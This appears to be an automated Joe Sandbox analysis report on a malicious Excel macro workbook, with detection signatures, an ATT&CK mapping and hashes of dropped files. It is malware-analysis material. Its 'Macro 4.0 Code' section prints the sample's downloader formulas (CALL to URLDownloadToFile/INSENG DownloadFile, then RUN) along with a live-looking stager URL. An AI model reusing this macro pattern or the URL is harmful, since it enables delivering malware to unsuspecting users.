Analysis Report request_form_1611306935.xlsm
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Compliance: |
---|
Uses new MSVCR Dlls |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Source: | File created: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: |
Source: | File read: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 6% | Virustotal | | |
| 9% | ReversingLabs | Document-Excel.Trojan.Heuristic | |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 343133 |
Start date: | 22.01.2021 |
Start time: | 11:40:35 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 27s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | request_form_1611306935.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 5 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal56.expl.evad.winXLSM@1/9@0/0 |
Cookbook Comments: |
Warnings: |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 17094 |
Entropy (8bit): | 7.243558253598769 |
Encrypted: | false |
SSDEEP: | 384:SE054FLBBP+BzJTit5vyuiMEWrGWnMbC32XRR34nB4:STeLBBP+O5DiM5MbC32bInm |
MD5: | C9542164110AF8CFC53ABD9EF7D1FAF2 |
SHA1: | D677B504674CBF88EE56AF1F6B9FCEE45955768B |
SHA-256: | E6663370EC760F464F45D1519946E2E9E8B30D803BD370A0108C31CDB09DE5F9 |
SHA-512: | 948FAD155DD234FAF956A42FCDDAA9EBC8A269AC23A0BAB5EB309285B39DBF654370245F8A2FF4D7DD66E0E716ABD9DD240CDE4C75F0F8541B952F510FEFC520 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.47700073466311 |
Encrypted: | false |
SSDEEP: | 12:85QYCLgXg/XAlCPCHaX2B8GB/GM0X+WnicvblubDtZ3YilMMEpxRljKlcTdJP9TK:85/U/XTm6GIDYeYDv3qEwrNru/ |
MD5: | 646E92259F25991D5918FD64547DE5BE |
SHA1: | FA9752F7698C259938948300B85FFC32A201AB61 |
SHA-256: | 1D954D9E191D7CFB6097DFDAE8B0342CB1D316187B08A8AFF25FF3CB94F40FC0 |
SHA-512: | 9708FCE46F1EE46933FD5043A3BAB7294068E208FA8F1A5F31826B1FDF5387FA382F406531661361568FAB3EA8A9D8F8F54E728C535B7E394AB82DB5637BC5AC |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 124 |
Entropy (8bit): | 4.730125367343892 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWcAOWJcWdPHWJcWdmxWcAOWJcWdv:djYOWJcWlHWJcWbOWJcWt |
MD5: | 9F2450545CBECE631C009CA27293A1CC |
SHA1: | 4E966E5262561E9A2C88AC96D7AA9E5F8FCE5958 |
SHA-256: | C272CB58A82E5B756E14FB5341A525DC3DD8493959F510DE996C2C7172F4A8FE |
SHA-512: | FB9A5C33FD6E03384357BEC8DF3711A27A76B2230A3ECE7BE847B6E3460A233241627AC853883A2AFCBF626B4C72BA9830410F760967052F2C222AD09FA20306 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2168 |
Entropy (8bit): | 4.530224630987585 |
Encrypted: | false |
SSDEEP: | 48:8k/XTFGFr9m6Vtc6bEwQh2k/XTFGFr9m6Vtc6bEwQ/:8k/XJGFr9jpbXQh2k/XJGFr9jpbXQ/ |
MD5: | 945DEFC498A20CE3B0830BF9B17464BF |
SHA1: | 3D721D3D07D8D181D13CAA05A6CC7B4EC8F32F05 |
SHA-256: | 4611AAB6008EC34530B2D47EDF5CF916CC5C0A03D7307AFFFFBEF8DDA66F0C6C |
SHA-512: | 94D8F8248948F20F0C3B62BE803E74DC85E0FA4D161EEF55AEA2B3F3B9F10C6BF503565C9BCAC305284ABF9783900F8068904613F4874C8D6970174750CB0A5A |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 17083 |
Entropy (8bit): | 7.246060583670574 |
Encrypted: | false |
SSDEEP: | 384:SE054tBP+BzJTLNuiMEWrGWnMbC32XRR3Sq:STsBP+4iM5MbC32bH |
MD5: | 4CBA89E3F0B78E6CD572AF4BD2840C01 |
SHA1: | E88E329EABEC40E106636EAFE6E82A19516C9E68 |
SHA-256: | C0311D754290840213BDA3FCB100669AC604595D933A4854674A22190745E383 |
SHA-512: | 9B6920EF13117137365F5627746BBCFAD949B26EC54D28DE2598CFF6F4E4D9927CA8FD591C6295544EF0CEB851EA956F628050DA6203234D3089BDF50C519A5E |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 17094 |
Entropy (8bit): | 7.243558253598769 |
Encrypted: | false |
SSDEEP: | 384:SE054FLBBP+BzJTit5vyuiMEWrGWnMbC32XRR34nB4:STeLBBP+O5DiM5MbC32bInm |
MD5: | C9542164110AF8CFC53ABD9EF7D1FAF2 |
SHA1: | D677B504674CBF88EE56AF1F6B9FCEE45955768B |
SHA-256: | E6663370EC760F464F45D1519946E2E9E8B30D803BD370A0108C31CDB09DE5F9 |
SHA-512: | 948FAD155DD234FAF956A42FCDDAA9EBC8A269AC23A0BAB5EB309285B39DBF654370245F8A2FF4D7DD66E0E716ABD9DD240CDE4C75F0F8541B952F510FEFC520 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.245499147058293 |
TrID: |
File name: | request_form_1611306935.xlsm |
File size: | 17127 |
MD5: | 5fd958006a94c6145364c06bbf264d06 |
SHA1: | d5cc7dc1083508dbe5531db67a3f78866e00330c |
SHA256: | f41c4588d2ef8936d9417069a1c5a44833fb2994c60c54bda14b1aac9aa7b83a |
SHA512: | a8c80661725284a629ec45f25331ea1349f63f4ea8245ae6c6fb62b9e3ac6114889c6b909c34332acd403ac7f0448a1692165b888aa8f7c4fa0ef8fbb404c0d9 |
SSDEEP: | 384:rNUK4o2aGcnzJTABwiMEx4o9QC32XRRl4Y:JUpaGcPiML8QC32blP |
File Content Preview: | PK..........!.................[Content_Types].xml ...(...............!!........................................................................................................................................................................................ |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "request_form_1611306935.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
Non-empty cells of the macro sheet, in sheet order (the CSV export's empty cells and doubled quotes have been removed):
=HALT()
=CALL('Doc2'!AA15&'Doc2'!AA16,'Doc2'!AB15&'Doc2'!AB16&'Doc2'!AB17,"JCJ",'Doc2'!AD15,0)
=CALL('Doc2'!AA19&'Doc2'!AA20,'Doc2'!AB19&'Doc2'!AB20&'Doc2'!AB21,"JCJ",'Doc2'!AD15&'Doc2'!AD19,0)
=CALL('Doc2'!AA23&'Doc2'!AA24,'Doc2'!AB23&'Doc2'!AB24&'Doc2'!AB25,"JJCCJJ",0,A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,0,0)
=CALL("INSENG","DownloadFile","BCCJ",A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,1)
=CALL('Doc2'!AA27&'Doc2'!AA28,'Doc2'!AB27&'Doc2'!AB28&'Doc2'!AB29,"JJCCCCJJ",0,'Doc2'!AD27,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,,0,0)
=RUN(Q1)
A second row of the sheet contains a single non-empty cell:
http://jvdattorney.com/stager/babmboa.php
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
System Behavior |
---|
General |
---|
Start time: | 11:41:45 |
Start date: | 22/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f2f0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|